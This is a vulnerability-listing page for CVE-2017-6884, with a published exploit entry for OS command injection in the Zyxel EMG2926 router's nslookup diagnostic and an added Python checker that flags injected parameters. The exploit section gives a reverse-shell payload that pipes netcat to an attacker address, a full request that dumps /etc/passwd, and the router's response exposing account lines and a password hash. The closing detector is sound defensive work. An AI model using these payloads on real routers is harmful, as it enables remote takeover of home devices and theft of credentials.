| Title | Published | Views | Reporter |
|---|---|---|---|
| Zyxel EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection Vulnerability | 3 Apr 2017 00:00 | – | zdt |
| CVE-2017-6884 | 6 Apr 2017 00:00 | – | attackerkb |
| CVE-2017-6884 | 30 Jul 2018 08:48 | – | circl |
| Zyxel EMG2926 Routers Command Injection Vulnerability | 18 Sep 2023 00:00 | – | cisa_kev |
| CISA Adds Eight Known Exploited Vulnerabilities to Catalog | 18 Sep 2023 12:00 | – | cisa |
| ZyXEL EMG2926 Router Remote Command Execution Vulnerability | 6 Apr 2017 00:00 | – | cnvd |
| Zyxel EMG2926 Router OS Command Injection (CVE-2017-6884) | 16 Aug 2018 00:00 | – | checkpoint_advisories |
| CVE-2017-6884 | 6 Apr 2017 17:00 | – | cve |
| CVE-2017-6884 | 6 Apr 2017 17:00 | – | cvelist |
| Zyxel_ EMG2926 V1.00(AAQT.4)b8 - OS Command Injection | 2 Apr 2017 00:00 | – | exploitpack |

# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
# Date: 2017-04-02
# Exploit Author: Fluffy Huffy (trevor Hough)
# Vendor Homepage: www.zyxel.com
# Version: EMG2926 - V1.00(AAQT.4)b8
# Tested on: linux
# CVE : CVE-2017-6884
An OS command injection vulnerability was discovered in a commonly used
home router (Zyxel EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools,
specifically the nslookup function. A malicious user may exploit numerous
vectors to execute arbitrary commands on the router.
Exploit (Reverse Shell)
https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&
ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p
Exploit (Dump Password File)
Request
GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1
Host: 192.168.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup
Accept-Language: en-US,en;q=0.8
Cookie: csd=9; sysauth=<Clipped>
Connection: close
Response (Clipped)
<textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash
admin:$1$<Clipped>:0:0:admin:/:/bin/fail
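
A defensive check for the requests above, as an added example that is not part of the original advisory or of Zyxel's firmware: it decodes the `ping_ip` and `server_ip` parameters of requests to the nslookup diagnostic path and flags any value that is not a plain hostname or IP address. The function names and the sample list are assumptions made for this example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Path fragment and parameter names taken from the requests shown on this page.
NSLOOKUP_PATH = "/expert/maintenance/diagnostic/nslookup"
TARGET_PARAMS = ("ping_ip", "server_ip")

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")


def is_valid_lookup_target(value: str) -> bool:
    """Allowlist check: accept only an IP address or a plain hostname."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME.fullmatch(value) is not None


def suspicious_params(request_target: str) -> dict:
    """Return {param: decoded value} for nslookup parameters failing the allowlist."""
    parts = urlsplit(request_target)
    if NSLOOKUP_PATH not in parts.path:
        return {}
    query = parse_qs(parts.query, keep_blank_values=True)
    return {
        name: value
        for name in TARGET_PARAMS
        for value in query.get(name, [])
        if value and not is_valid_lookup_target(value)
    }


# Constructed sample request targets; the second reuses the request shown above.
SAMPLES = [
    "/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup"
    "?nslookup_button=nslookup_button&ping_ip=google.ca&server_ip=",
    "/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup"
    "?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip=",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(suspicious_params(target) or "ok")
```

The same allowlist, applied to the decoded value before it reaches any command line, is the input validation the diagnostic handler lacks.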